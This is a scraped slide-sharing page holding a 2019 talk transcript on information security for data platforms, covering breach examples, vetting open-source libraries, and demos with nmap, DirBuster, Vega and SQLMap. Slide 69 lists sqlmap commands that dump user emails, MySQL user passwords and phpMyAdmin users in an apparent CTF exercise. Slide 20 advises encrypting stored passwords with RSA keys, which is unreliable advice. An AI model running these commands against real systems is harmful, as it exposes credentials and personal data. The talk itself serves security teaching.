Dev{sec}opsDev{sec}ops
Dev{sec}ops
Steven Carlson
 
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsWeb Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
Alan Kan
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0
Neelu Tripathy
 
Software Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and SecuritySoftware Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and Security
Tao Xie
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
fangjiafu
 
PROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITYPROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITY
Sylvain Martinez
 
Security guidelines
Security guidelinesSecurity guidelines
Security guidelines
karthz
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Keith Kraus
 
Ad

More from Chetan Khatri (20)

PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-AirflowPyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
Chetan Khatri
 
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in productionScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
Chetan Khatri
 
No more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in productionNo more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in production
Chetan Khatri
 
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_productionPyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
Chetan Khatri
 
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scalaAutomate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Chetan Khatri
 
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
Chetan Khatri
 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
Chetan Khatri
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with Scala
Chetan Khatri
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC Demo
Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
Chetan Khatri
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatri
Chetan Khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...
Chetan Khatri
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learning
Chetan Khatri
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer Science
Chetan Khatri
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian Suite
Chetan Khatri
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetan
Chetan Khatri
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabs
Chetan Khatri
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduino
Chetan Khatri
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy Meter
Chetan Khatri
 
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-AirflowPyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
Chetan Khatri
 
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in productionScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
Chetan Khatri
 
No more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in productionNo more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in production
Chetan Khatri
 
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_productionPyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
Chetan Khatri
 
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scalaAutomate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Chetan Khatri
 
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
Chetan Khatri
 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
Chetan Khatri
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with Scala
Chetan Khatri
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC Demo
Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
Chetan Khatri
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatri
Chetan Khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...
Chetan Khatri
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learning
Chetan Khatri
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer Science
Chetan Khatri
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian Suite
Chetan Khatri
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetan
Chetan Khatri
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabs
Chetan Khatri
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduino
Chetan Khatri
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy Meter
Chetan Khatri
 
Ad

Recently uploaded (20)

Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptxIncreasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Anoop Ashok
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx
Samuele Fogagnolo
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Quantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur MorganQuantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur Morgan
Arthur Morgan
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Aqusag Technologies
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdfThe Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
Abi john
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptxIncreasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Anoop Ashok
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx
Samuele Fogagnolo
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Quantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur MorganQuantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur Morgan
Arthur Morgan
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Aqusag Technologies
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdfThe Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
Abi john
 

Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri

  • 1. Demystify Information Security & Threats for Data-Driven Platforms Chetan Khatri Solution Architect - Data & ML. Accionlabs Inc. 18th Oct, 2019
  • 2. Who Am I? Professional Career: ● 2016 - Present. - Technical Lead / Solution Architect - Data & ML. ● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice. ● 2014 - 2016 - Developer - Data Platforms. ● 2012 - 2014 - Consultant - Product developments. University: Master of Computer Science. Data Warehousing, Data Mining, Information Security / Cryptography, Reverse Engineering, Information Retrieval.
  • 3. Agenda ● Motivation ● Information Security - Ethics. ● Encryption ● Authentication ● Information Security & Potential threats with Open Source World. ● Find vulnerabilities. ● Checklist before using any Open Source library. ● Vulnerabilities report. ● Penetration Testing for Data Driven Developments.
  • 4. Information Security - Motivation Why Information Security is important?
  • 5. Information Security - Motivation Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-ac cessed-email-ids-phone-numbers-of-over-5-million-yatra-u sers_a_23475885/
  • 6. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
  • 7. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
  • 8. Information Security - Motivation Source: https://economictimes.indiatimes.com/smal l-biz/security-tech/security/zomato-hacked- security-breach-results-in-17-million-user-d ata-stolen/articleshow/58729251.cms
  • 9. Information Security - Motivation Source: https://www.forbes.com/sites/zakdoffman/2 019/07/09/warning-as-millions-of-zoom-us ers-risk-webcam-hijack-change-your-settin gs-now/#281cb40642d9
  • 14. Information Security - Ethics. ● Information Storage - What, Which form, Access to whom? ● Information Usage - Where, How, Which form? ● Responsibility - Ownership, usage? ● Confidentiality ● Authentication ● Governance - Regulators, Guidelines, Damage? ● Freedom vs Force ● Damage to the Society. ● Impact on humanity. ● Data Breach and Cost.
  • 18. Data Monetization against ethics Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns- about-cambridge-analytica-in-september-2015-per-court-filing/ Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analyti ca-facebook-influence-us-election
  • 19. Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack -password/
  • 20. Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Never ever store password of the application in Plain-text. Encrypt it. Use Asymmetric Key Encryption If RSA, use ssh-keygen -t rsa -b 4096
  • 21. Authentication Open IP Open Ports Default Username and Password for Database, Services etc. Chmod 777 for all directories, files ! Lol ;p
  • 22. Information Security & Potential threats with Open Source World.
  • 23. Information Security & Potential threats with Open Source World. How many of you use Open Source ?
  • 24. Security for Open Source world How well do you know what is inside your project?
  • 25. Security for Open Source world Known Good Development practices. Community Supported Open Source Code. v/s Random Code found on the Internet.
  • 26. Vulnerability in Open Source Source: https://synopsys.com/content/dam/synopsys/sig-assets/repo rts/2018-ossra.pdf
  • 27. How Do I Choose GOOD Open Source
  • 28. How do I choose SECURE open source packages?
  • 29. How do I choose SECURE open source packages? Have a look First look
  • 30. Key questions for a first look? ● Read the README.md or any other readily accessible introductory information? ● Does code seem to be held with good software development standards? ● Does this code develop for professional purposes or hobby projects? ● Any signs for known issues in the code? ● Does this code only solve one use case or is it robust enough for other use cases? ● Is this code active or an archive, “abandoned”? Look for warning signs...
  • 32. Even an author says - to use something else! Source: https://code.google.com/archive/p/c rypto-js/
  • 33. Build by an unauthorized person Source: https://metacpan.org/release/Tivoli- AccessManager-Admin
  • 34. I did not write this code, but I like it. Source: https://github.com/kbranigan/cJSON
  • 35. Not maintained anymore … Archived! Source: https://code.google.com/archive/p/crypto-js/
  • 36. Dumbest library - An author! Source: https://github.com/kbranigan/cJSON/commit/730 209a718cc9bada631cea136d13017752720f5
  • 37. It is slower and more subjective to side-channel attacks by nature. Source: http://www.literatecode.com/aes256
  • 38. What to watch before using any package/library?
  • 39. Key Questions for each Open Source Library Do only 1-2 Collaborators exist? Chances are more to have unreviewed, harmful code. Code merged to master branch is been reviewed with PR? How many issues are OPEN? Validate that OPEN issues are being addressed? Is that code maintained or abandon? Are issues getting fixed and released promptly?
  • 40. Key Questions for each Open Source Library Check recently active committers and commit? To understand how old is the project. Check how they handle vulnerabilities and security. How you can report security vulnerabilities? Check open security bugs/issues? Good example: Apache Community. https://www.apache.org/security/
  • 43. No known vulnerabilities doesn’t mean SECURITY! 1101 new vulnerabilities reported only in Oct, 2019. Source: https://nvd.nist.gov/vuln/full-l isting/2019/10
  • 44. Vulnerabilities report we are going far worse! Source: https://www.cvedetails.com/brows e-by-date.php
  • 46. Check number of OPEN services and ports sudo nmap -p- -sS -A IP-Address
  • 47. Server Files / Directories Scan on permission and Access java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337 httrack website copier
  • 48. Subgraph Vega ● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications. ● SQL Injection ● XSS ● Inadvertently disclosed sensitive information ● Reflected cross-site scripting ● Stored cross-site scripting ● Blind SQL injection ● Remote file include ● Shell injection ● TLS / SSL security settings
  • 49. Setup Proxy for Vega Tool
  • 50. Setup Proxy for Vega Tool
  • 51. Vega - Start the proxy!
  • 52. Vega - Start scanning Web application
  • 53. Vega - Start scanning Web application
  • 56. Web Application - Tracing web request payload at Proxy
  • 57. Web Application - Tracing web request payload at Proxy
  • 58. Web Application - Intercepting the response callback at Proxy
  • 59. SqlMap - A penetration testing tool for exploiting SQL injection flaws and a lot! ● Database fingerprinting. ● Full Support for SQL Injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. ● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack. ● dump database tables entirely. ● Out of Box Search support for Database names, Table names, Column names and values. ● Support to execute arbitrary commands and retrieve their standard output. ● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
  • 60. Demo - Penetration testing a Web Application using SQLMap
  • 61. Demo - Penetration testing a Web Application using SQLMap
  • 62. Demo - Penetration testing a Web Application using SQLMap
  • 63. Demo - Penetration testing a Web Application using SQLMap
  • 64. Demo - Penetration testing a Web Application using SQLMap
  • 65. Demo - Penetration testing a Web Application using SQLMap
  • 66. Demo - Penetration testing a Web Application using SQLMap
  • 67. Demo - Penetration testing a Web Application using SQLMap
  • 68. Demo - Penetration testing a Web Application using SQLMap
  • 69. SQLMap - Commands python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a 8709f33ac5
  • 71. Hope you had a fun!
